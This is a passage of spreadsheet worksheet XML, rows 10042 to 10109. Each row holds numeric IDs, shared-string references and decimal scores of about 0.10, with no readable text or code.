      </c>
      <c r="C10042" s="2" t="s">
        <v>9602</v>
      </c>
      <c r="D10042" s="2">
        <v>1.0</v>
      </c>
      <c r="E10042" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10042" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10043" ht="15.75" customHeight="1">
      <c r="A10043" s="1">
        <v>11955.0</v>
      </c>
      <c r="B10043" s="2">
        <v>2.5593667E7</v>
      </c>
      <c r="C10043" s="2" t="s">
        <v>9603</v>
      </c>
      <c r="D10043" s="2">
        <v>1.0</v>
      </c>
      <c r="E10043" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10043" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10044" ht="15.75" customHeight="1">
      <c r="A10044" s="1">
        <v>12477.0</v>
      </c>
      <c r="B10044" s="2">
        <v>2.9476744E7</v>
      </c>
      <c r="C10044" s="2" t="s">
        <v>9604</v>
      </c>
      <c r="D10044" s="2">
        <v>1.0</v>
      </c>
      <c r="E10044" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10044" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10045" ht="15.75" customHeight="1">
      <c r="A10045" s="1">
        <v>15853.0</v>
      </c>
      <c r="B10045" s="2">
        <v>4.4456566E7</v>
      </c>
      <c r="C10045" s="2" t="s">
        <v>9605</v>
      </c>
      <c r="D10045" s="2">
        <v>1.0</v>
      </c>
      <c r="E10045" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10045" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10046" ht="15.75" customHeight="1">
      <c r="A10046" s="1">
        <v>11248.0</v>
      </c>
      <c r="B10046" s="2">
        <v>2.0493473E7</v>
      </c>
      <c r="C10046" s="2" t="s">
        <v>9606</v>
      </c>
      <c r="D10046" s="2">
        <v>1.0</v>
      </c>
      <c r="E10046" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10046" s="2">
        <v>0.1032986111111111</v>
      </c>
    </row>
    <row r="10047" ht="15.75" customHeight="1">
      <c r="A10047" s="1">
        <v>2952.0</v>
      </c>
      <c r="B10047" s="2">
        <v>3.6005502E7</v>
      </c>
      <c r="C10047" s="2" t="s">
        <v>9607</v>
      </c>
      <c r="D10047" s="2">
        <v>1.0</v>
      </c>
      <c r="E10047" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10047" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="10048" ht="15.75" customHeight="1">
      <c r="A10048" s="1">
        <v>24339.0</v>
      </c>
      <c r="B10048" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C10048" s="2" t="s">
        <v>9608</v>
      </c>
      <c r="D10048" s="2">
        <v>1.0</v>
      </c>
      <c r="E10048" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10048" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="10049" ht="15.75" customHeight="1">
      <c r="A10049" s="1">
        <v>33138.0</v>
      </c>
      <c r="B10049" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C10049" s="2" t="s">
        <v>9609</v>
      </c>
      <c r="D10049" s="2">
        <v>1.0</v>
      </c>
      <c r="E10049" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10049" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="10050" ht="15.75" customHeight="1">
      <c r="A10050" s="1">
        <v>4531.0</v>
      </c>
      <c r="B10050" s="2">
        <v>4.2641595E7</v>
      </c>
      <c r="C10050" s="2" t="s">
        <v>9610</v>
      </c>
      <c r="D10050" s="2">
        <v>1.0</v>
      </c>
      <c r="E10050" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10050" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10051" ht="15.75" customHeight="1">
      <c r="A10051" s="1">
        <v>7349.0</v>
      </c>
      <c r="B10051" s="2">
        <v>5.098317E7</v>
      </c>
      <c r="C10051" s="2" t="s">
        <v>9611</v>
      </c>
      <c r="D10051" s="2">
        <v>1.0</v>
      </c>
      <c r="E10051" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10051" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10052" ht="15.75" customHeight="1">
      <c r="A10052" s="1">
        <v>7929.0</v>
      </c>
      <c r="B10052" s="2">
        <v>5.2576883E7</v>
      </c>
      <c r="C10052" s="2" t="s">
        <v>9612</v>
      </c>
      <c r="D10052" s="2">
        <v>1.0</v>
      </c>
      <c r="E10052" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10052" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10053" ht="15.75" customHeight="1">
      <c r="A10053" s="1">
        <v>10952.0</v>
      </c>
      <c r="B10053" s="2">
        <v>1.7124671E7</v>
      </c>
      <c r="C10053" s="2" t="s">
        <v>9613</v>
      </c>
      <c r="D10053" s="2">
        <v>1.0</v>
      </c>
      <c r="E10053" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10053" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10054" ht="15.75" customHeight="1">
      <c r="A10054" s="1">
        <v>14808.0</v>
      </c>
      <c r="B10054" s="2">
        <v>4.0924149E7</v>
      </c>
      <c r="C10054" s="2" t="s">
        <v>9614</v>
      </c>
      <c r="D10054" s="2">
        <v>1.0</v>
      </c>
      <c r="E10054" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10054" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10055" ht="15.75" customHeight="1">
      <c r="A10055" s="1">
        <v>14889.0</v>
      </c>
      <c r="B10055" s="2">
        <v>4.1127494E7</v>
      </c>
      <c r="C10055" s="2" t="s">
        <v>9615</v>
      </c>
      <c r="D10055" s="2">
        <v>1.0</v>
      </c>
      <c r="E10055" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10055" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10056" ht="15.75" customHeight="1">
      <c r="A10056" s="1">
        <v>15050.0</v>
      </c>
      <c r="B10056" s="2">
        <v>4.1623154E7</v>
      </c>
      <c r="C10056" s="2" t="s">
        <v>9616</v>
      </c>
      <c r="D10056" s="2">
        <v>1.0</v>
      </c>
      <c r="E10056" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10056" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10057" ht="15.75" customHeight="1">
      <c r="A10057" s="1">
        <v>17638.0</v>
      </c>
      <c r="B10057" s="2">
        <v>5.0397917E7</v>
      </c>
      <c r="C10057" s="2" t="s">
        <v>9617</v>
      </c>
      <c r="D10057" s="2">
        <v>1.0</v>
      </c>
      <c r="E10057" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10057" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10058" ht="15.75" customHeight="1">
      <c r="A10058" s="1">
        <v>26981.0</v>
      </c>
      <c r="B10058" s="2">
        <v>1.9754349E7</v>
      </c>
      <c r="C10058" s="2" t="s">
        <v>9618</v>
      </c>
      <c r="D10058" s="2">
        <v>1.0</v>
      </c>
      <c r="E10058" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10058" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10059" ht="15.75" customHeight="1">
      <c r="A10059" s="1">
        <v>28318.0</v>
      </c>
      <c r="B10059" s="2">
        <v>2.5757745E7</v>
      </c>
      <c r="C10059" s="2" t="s">
        <v>9619</v>
      </c>
      <c r="D10059" s="2">
        <v>1.0</v>
      </c>
      <c r="E10059" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10059" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10060" ht="15.75" customHeight="1">
      <c r="A10060" s="1">
        <v>30007.0</v>
      </c>
      <c r="B10060" s="2">
        <v>3.6153369E7</v>
      </c>
      <c r="C10060" s="2" t="s">
        <v>9620</v>
      </c>
      <c r="D10060" s="2">
        <v>1.0</v>
      </c>
      <c r="E10060" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10060" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="10061" ht="15.75" customHeight="1">
      <c r="A10061" s="1">
        <v>17777.0</v>
      </c>
      <c r="B10061" s="2">
        <v>5.0770952E7</v>
      </c>
      <c r="C10061" s="2" t="s">
        <v>9621</v>
      </c>
      <c r="D10061" s="2">
        <v>1.0</v>
      </c>
      <c r="E10061" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10061" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="10062" ht="15.75" customHeight="1">
      <c r="A10062" s="1">
        <v>32358.0</v>
      </c>
      <c r="B10062" s="2">
        <v>5.5942383E7</v>
      </c>
      <c r="C10062" s="2" t="s">
        <v>9622</v>
      </c>
      <c r="D10062" s="2">
        <v>1.0</v>
      </c>
      <c r="E10062" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10062" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="10063" ht="15.75" customHeight="1">
      <c r="A10063" s="1">
        <v>33519.0</v>
      </c>
      <c r="B10063" s="2">
        <v>8093698.0</v>
      </c>
      <c r="C10063" s="2" t="s">
        <v>9623</v>
      </c>
      <c r="D10063" s="2">
        <v>1.0</v>
      </c>
      <c r="E10063" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10063" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="10064" ht="15.75" customHeight="1">
      <c r="A10064" s="1">
        <v>1214.0</v>
      </c>
      <c r="B10064" s="2">
        <v>2.4878529E7</v>
      </c>
      <c r="C10064" s="2" t="s">
        <v>9624</v>
      </c>
      <c r="D10064" s="2">
        <v>1.0</v>
      </c>
      <c r="E10064" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10064" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="10065" ht="15.75" customHeight="1">
      <c r="A10065" s="1">
        <v>6990.0</v>
      </c>
      <c r="B10065" s="2">
        <v>5.0072902E7</v>
      </c>
      <c r="C10065" s="2" t="s">
        <v>9625</v>
      </c>
      <c r="D10065" s="2">
        <v>1.0</v>
      </c>
      <c r="E10065" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10065" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="10066" ht="15.75" customHeight="1">
      <c r="A10066" s="1">
        <v>25244.0</v>
      </c>
      <c r="B10066" s="2">
        <v>1.3381641E7</v>
      </c>
      <c r="C10066" s="2" t="s">
        <v>9626</v>
      </c>
      <c r="D10066" s="2">
        <v>1.0</v>
      </c>
      <c r="E10066" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10066" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="10067" ht="15.75" customHeight="1">
      <c r="A10067" s="1">
        <v>5186.0</v>
      </c>
      <c r="B10067" s="2">
        <v>4.4787231E7</v>
      </c>
      <c r="C10067" s="2" t="s">
        <v>9627</v>
      </c>
      <c r="D10067" s="2">
        <v>1.0</v>
      </c>
      <c r="E10067" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10067" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="10068" ht="15.75" customHeight="1">
      <c r="A10068" s="1">
        <v>8165.0</v>
      </c>
      <c r="B10068" s="2">
        <v>5.3209412E7</v>
      </c>
      <c r="C10068" s="2" t="s">
        <v>9628</v>
      </c>
      <c r="D10068" s="2">
        <v>1.0</v>
      </c>
      <c r="E10068" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10068" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="10069" ht="15.75" customHeight="1">
      <c r="A10069" s="1">
        <v>9705.0</v>
      </c>
      <c r="B10069" s="2">
        <v>5.6378895E7</v>
      </c>
      <c r="C10069" s="2" t="s">
        <v>9629</v>
      </c>
      <c r="D10069" s="2">
        <v>1.0</v>
      </c>
      <c r="E10069" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10069" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="10070" ht="15.75" customHeight="1">
      <c r="A10070" s="1">
        <v>16077.0</v>
      </c>
      <c r="B10070" s="2">
        <v>4.5332952E7</v>
      </c>
      <c r="C10070" s="2" t="s">
        <v>9630</v>
      </c>
      <c r="D10070" s="2">
        <v>1.0</v>
      </c>
      <c r="E10070" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10070" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="10071" ht="15.75" customHeight="1">
      <c r="A10071" s="1">
        <v>26420.0</v>
      </c>
      <c r="B10071" s="2">
        <v>1.7146484E7</v>
      </c>
      <c r="C10071" s="2" t="s">
        <v>9631</v>
      </c>
      <c r="D10071" s="2">
        <v>1.0</v>
      </c>
      <c r="E10071" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10071" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="10072" ht="15.75" customHeight="1">
      <c r="A10072" s="1">
        <v>674.0</v>
      </c>
      <c r="B10072" s="2">
        <v>2.0255194E7</v>
      </c>
      <c r="C10072" s="2" t="s">
        <v>9632</v>
      </c>
      <c r="D10072" s="2">
        <v>1.0</v>
      </c>
      <c r="E10072" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10072" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10073" ht="15.75" customHeight="1">
      <c r="A10073" s="1">
        <v>1529.0</v>
      </c>
      <c r="B10073" s="2">
        <v>2.7439367E7</v>
      </c>
      <c r="C10073" s="2" t="s">
        <v>9633</v>
      </c>
      <c r="D10073" s="2">
        <v>1.0</v>
      </c>
      <c r="E10073" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10073" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10074" ht="15.75" customHeight="1">
      <c r="A10074" s="1">
        <v>1713.0</v>
      </c>
      <c r="B10074" s="2">
        <v>2.8589411E7</v>
      </c>
      <c r="C10074" s="2" t="s">
        <v>9634</v>
      </c>
      <c r="D10074" s="2">
        <v>1.0</v>
      </c>
      <c r="E10074" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10074" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10075" ht="15.75" customHeight="1">
      <c r="A10075" s="1">
        <v>2835.0</v>
      </c>
      <c r="B10075" s="2">
        <v>3.5422422E7</v>
      </c>
      <c r="C10075" s="2" t="s">
        <v>9635</v>
      </c>
      <c r="D10075" s="2">
        <v>1.0</v>
      </c>
      <c r="E10075" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10075" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10076" ht="15.75" customHeight="1">
      <c r="A10076" s="1">
        <v>4195.0</v>
      </c>
      <c r="B10076" s="2">
        <v>4.1603873E7</v>
      </c>
      <c r="C10076" s="2" t="s">
        <v>9636</v>
      </c>
      <c r="D10076" s="2">
        <v>1.0</v>
      </c>
      <c r="E10076" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10076" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10077" ht="15.75" customHeight="1">
      <c r="A10077" s="1">
        <v>7171.0</v>
      </c>
      <c r="B10077" s="2">
        <v>5.05263E7</v>
      </c>
      <c r="C10077" s="2" t="s">
        <v>9637</v>
      </c>
      <c r="D10077" s="2">
        <v>1.0</v>
      </c>
      <c r="E10077" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10077" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10078" ht="15.75" customHeight="1">
      <c r="A10078" s="1">
        <v>9093.0</v>
      </c>
      <c r="B10078" s="2">
        <v>5.5144452E7</v>
      </c>
      <c r="C10078" s="2" t="s">
        <v>9638</v>
      </c>
      <c r="D10078" s="2">
        <v>1.0</v>
      </c>
      <c r="E10078" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10078" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10079" ht="15.75" customHeight="1">
      <c r="A10079" s="1">
        <v>17009.0</v>
      </c>
      <c r="B10079" s="2">
        <v>4.8432459E7</v>
      </c>
      <c r="C10079" s="2" t="s">
        <v>9639</v>
      </c>
      <c r="D10079" s="2">
        <v>1.0</v>
      </c>
      <c r="E10079" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10079" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10080" ht="15.75" customHeight="1">
      <c r="A10080" s="1">
        <v>29951.0</v>
      </c>
      <c r="B10080" s="2">
        <v>3607598.0</v>
      </c>
      <c r="C10080" s="2" t="s">
        <v>9640</v>
      </c>
      <c r="D10080" s="2">
        <v>1.0</v>
      </c>
      <c r="E10080" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10080" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10081" ht="15.75" customHeight="1">
      <c r="A10081" s="1">
        <v>31149.0</v>
      </c>
      <c r="B10081" s="2">
        <v>4.8899928E7</v>
      </c>
      <c r="C10081" s="2" t="s">
        <v>9641</v>
      </c>
      <c r="D10081" s="2">
        <v>1.0</v>
      </c>
      <c r="E10081" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10081" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="10082" ht="15.75" customHeight="1">
      <c r="A10082" s="1">
        <v>290.0</v>
      </c>
      <c r="B10082" s="2">
        <v>1.5463859E7</v>
      </c>
      <c r="C10082" s="2" t="s">
        <v>9642</v>
      </c>
      <c r="D10082" s="2">
        <v>1.0</v>
      </c>
      <c r="E10082" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10082" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10083" ht="15.75" customHeight="1">
      <c r="A10083" s="1">
        <v>409.0</v>
      </c>
      <c r="B10083" s="2">
        <v>1.6697115E7</v>
      </c>
      <c r="C10083" s="2" t="s">
        <v>9643</v>
      </c>
      <c r="D10083" s="2">
        <v>1.0</v>
      </c>
      <c r="E10083" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10083" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10084" ht="15.75" customHeight="1">
      <c r="A10084" s="1">
        <v>3306.0</v>
      </c>
      <c r="B10084" s="2">
        <v>3.7590043E7</v>
      </c>
      <c r="C10084" s="2" t="s">
        <v>9644</v>
      </c>
      <c r="D10084" s="2">
        <v>1.0</v>
      </c>
      <c r="E10084" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10084" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10085" ht="15.75" customHeight="1">
      <c r="A10085" s="1">
        <v>4689.0</v>
      </c>
      <c r="B10085" s="2">
        <v>4.3230213E7</v>
      </c>
      <c r="C10085" s="2" t="s">
        <v>9645</v>
      </c>
      <c r="D10085" s="2">
        <v>1.0</v>
      </c>
      <c r="E10085" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10085" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10086" ht="15.75" customHeight="1">
      <c r="A10086" s="1">
        <v>6689.0</v>
      </c>
      <c r="B10086" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C10086" s="2" t="s">
        <v>9646</v>
      </c>
      <c r="D10086" s="2">
        <v>1.0</v>
      </c>
      <c r="E10086" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10086" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10087" ht="15.75" customHeight="1">
      <c r="A10087" s="1">
        <v>10462.0</v>
      </c>
      <c r="B10087" s="2">
        <v>1.0775561E7</v>
      </c>
      <c r="C10087" s="2" t="s">
        <v>9647</v>
      </c>
      <c r="D10087" s="2">
        <v>1.0</v>
      </c>
      <c r="E10087" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10087" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10088" ht="15.75" customHeight="1">
      <c r="A10088" s="1">
        <v>13243.0</v>
      </c>
      <c r="B10088" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C10088" s="2" t="s">
        <v>9648</v>
      </c>
      <c r="D10088" s="2">
        <v>1.0</v>
      </c>
      <c r="E10088" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10088" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10089" ht="15.75" customHeight="1">
      <c r="A10089" s="1">
        <v>15087.0</v>
      </c>
      <c r="B10089" s="2">
        <v>4.1779336E7</v>
      </c>
      <c r="C10089" s="2" t="s">
        <v>9649</v>
      </c>
      <c r="D10089" s="2">
        <v>1.0</v>
      </c>
      <c r="E10089" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10089" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10090" ht="15.75" customHeight="1">
      <c r="A10090" s="1">
        <v>15466.0</v>
      </c>
      <c r="B10090" s="2">
        <v>4.3120835E7</v>
      </c>
      <c r="C10090" s="2" t="s">
        <v>9650</v>
      </c>
      <c r="D10090" s="2">
        <v>1.0</v>
      </c>
      <c r="E10090" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10090" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10091" ht="15.75" customHeight="1">
      <c r="A10091" s="1">
        <v>16041.0</v>
      </c>
      <c r="B10091" s="2">
        <v>4.5136698E7</v>
      </c>
      <c r="C10091" s="2" t="s">
        <v>9651</v>
      </c>
      <c r="D10091" s="2">
        <v>1.0</v>
      </c>
      <c r="E10091" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10091" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10092" ht="15.75" customHeight="1">
      <c r="A10092" s="1">
        <v>19105.0</v>
      </c>
      <c r="B10092" s="2">
        <v>5.4728441E7</v>
      </c>
      <c r="C10092" s="2" t="s">
        <v>9652</v>
      </c>
      <c r="D10092" s="2">
        <v>1.0</v>
      </c>
      <c r="E10092" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10092" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10093" ht="15.75" customHeight="1">
      <c r="A10093" s="1">
        <v>22325.0</v>
      </c>
      <c r="B10093" s="2">
        <v>3.4059587E7</v>
      </c>
      <c r="C10093" s="2" t="s">
        <v>9653</v>
      </c>
      <c r="D10093" s="2">
        <v>1.0</v>
      </c>
      <c r="E10093" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10093" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10094" ht="15.75" customHeight="1">
      <c r="A10094" s="1">
        <v>23928.0</v>
      </c>
      <c r="B10094" s="2">
        <v>8605421.0</v>
      </c>
      <c r="C10094" s="2" t="s">
        <v>9583</v>
      </c>
      <c r="D10094" s="2">
        <v>1.0</v>
      </c>
      <c r="E10094" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10094" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10095" ht="15.75" customHeight="1">
      <c r="A10095" s="1">
        <v>30196.0</v>
      </c>
      <c r="B10095" s="2">
        <v>3.7267842E7</v>
      </c>
      <c r="C10095" s="2" t="s">
        <v>9654</v>
      </c>
      <c r="D10095" s="2">
        <v>1.0</v>
      </c>
      <c r="E10095" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10095" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="10096" ht="15.75" customHeight="1">
      <c r="A10096" s="1">
        <v>5541.0</v>
      </c>
      <c r="B10096" s="2">
        <v>4.59248E7</v>
      </c>
      <c r="C10096" s="2" t="s">
        <v>9655</v>
      </c>
      <c r="D10096" s="2">
        <v>1.0</v>
      </c>
      <c r="E10096" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10096" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="10097" ht="15.75" customHeight="1">
      <c r="A10097" s="1">
        <v>601.0</v>
      </c>
      <c r="B10097" s="2">
        <v>1.9283307E7</v>
      </c>
      <c r="C10097" s="2" t="s">
        <v>9656</v>
      </c>
      <c r="D10097" s="2">
        <v>1.0</v>
      </c>
      <c r="E10097" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10097" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10098" ht="15.75" customHeight="1">
      <c r="A10098" s="1">
        <v>1115.0</v>
      </c>
      <c r="B10098" s="2">
        <v>2.408703E7</v>
      </c>
      <c r="C10098" s="2" t="s">
        <v>9657</v>
      </c>
      <c r="D10098" s="2">
        <v>1.0</v>
      </c>
      <c r="E10098" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10098" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10099" ht="15.75" customHeight="1">
      <c r="A10099" s="1">
        <v>5065.0</v>
      </c>
      <c r="B10099" s="2">
        <v>4.4372545E7</v>
      </c>
      <c r="C10099" s="2" t="s">
        <v>9658</v>
      </c>
      <c r="D10099" s="2">
        <v>1.0</v>
      </c>
      <c r="E10099" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10099" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10100" ht="15.75" customHeight="1">
      <c r="A10100" s="1">
        <v>5266.0</v>
      </c>
      <c r="B10100" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C10100" s="2" t="s">
        <v>9659</v>
      </c>
      <c r="D10100" s="2">
        <v>1.0</v>
      </c>
      <c r="E10100" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10100" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10101" ht="15.75" customHeight="1">
      <c r="A10101" s="1">
        <v>5827.0</v>
      </c>
      <c r="B10101" s="2">
        <v>4.6893457E7</v>
      </c>
      <c r="C10101" s="2" t="s">
        <v>9660</v>
      </c>
      <c r="D10101" s="2">
        <v>1.0</v>
      </c>
      <c r="E10101" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10101" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10102" ht="15.75" customHeight="1">
      <c r="A10102" s="1">
        <v>5978.0</v>
      </c>
      <c r="B10102" s="2">
        <v>4.7376575E7</v>
      </c>
      <c r="C10102" s="2" t="s">
        <v>9661</v>
      </c>
      <c r="D10102" s="2">
        <v>1.0</v>
      </c>
      <c r="E10102" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10102" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10103" ht="15.75" customHeight="1">
      <c r="A10103" s="1">
        <v>7316.0</v>
      </c>
      <c r="B10103" s="2">
        <v>5.0871088E7</v>
      </c>
      <c r="C10103" s="2" t="s">
        <v>9662</v>
      </c>
      <c r="D10103" s="2">
        <v>1.0</v>
      </c>
      <c r="E10103" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10103" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10104" ht="15.75" customHeight="1">
      <c r="A10104" s="1">
        <v>7898.0</v>
      </c>
      <c r="B10104" s="2">
        <v>5.2463105E7</v>
      </c>
      <c r="C10104" s="2" t="s">
        <v>9663</v>
      </c>
      <c r="D10104" s="2">
        <v>1.0</v>
      </c>
      <c r="E10104" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10104" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10105" ht="15.75" customHeight="1">
      <c r="A10105" s="1">
        <v>12157.0</v>
      </c>
      <c r="B10105" s="2">
        <v>2.7303417E7</v>
      </c>
      <c r="C10105" s="2" t="s">
        <v>9664</v>
      </c>
      <c r="D10105" s="2">
        <v>1.0</v>
      </c>
      <c r="E10105" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10105" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10106" ht="15.75" customHeight="1">
      <c r="A10106" s="1">
        <v>16264.0</v>
      </c>
      <c r="B10106" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C10106" s="2" t="s">
        <v>9665</v>
      </c>
      <c r="D10106" s="2">
        <v>1.0</v>
      </c>
      <c r="E10106" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10106" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10107" ht="15.75" customHeight="1">
      <c r="A10107" s="1">
        <v>18030.0</v>
      </c>
      <c r="B10107" s="2">
        <v>5.153502E7</v>
      </c>
      <c r="C10107" s="2" t="s">
        <v>9666</v>
      </c>
      <c r="D10107" s="2">
        <v>1.0</v>
      </c>
      <c r="E10107" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10107" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10108" ht="15.75" customHeight="1">
      <c r="A10108" s="1">
        <v>23163.0</v>
      </c>
      <c r="B10108" s="2">
        <v>5.195176E7</v>
      </c>
      <c r="C10108" s="2" t="s">
        <v>9667</v>
      </c>
      <c r="D10108" s="2">
        <v>1.0</v>
      </c>
      <c r="E10108" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10108" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10109" ht="15.75" customHeight="1">
      <c r="A10109" s="1">
        <v>24209.0</v>
      </c>
      <c r="B10109" s="2">
        <v>1.0382417E7</v>
      </c>
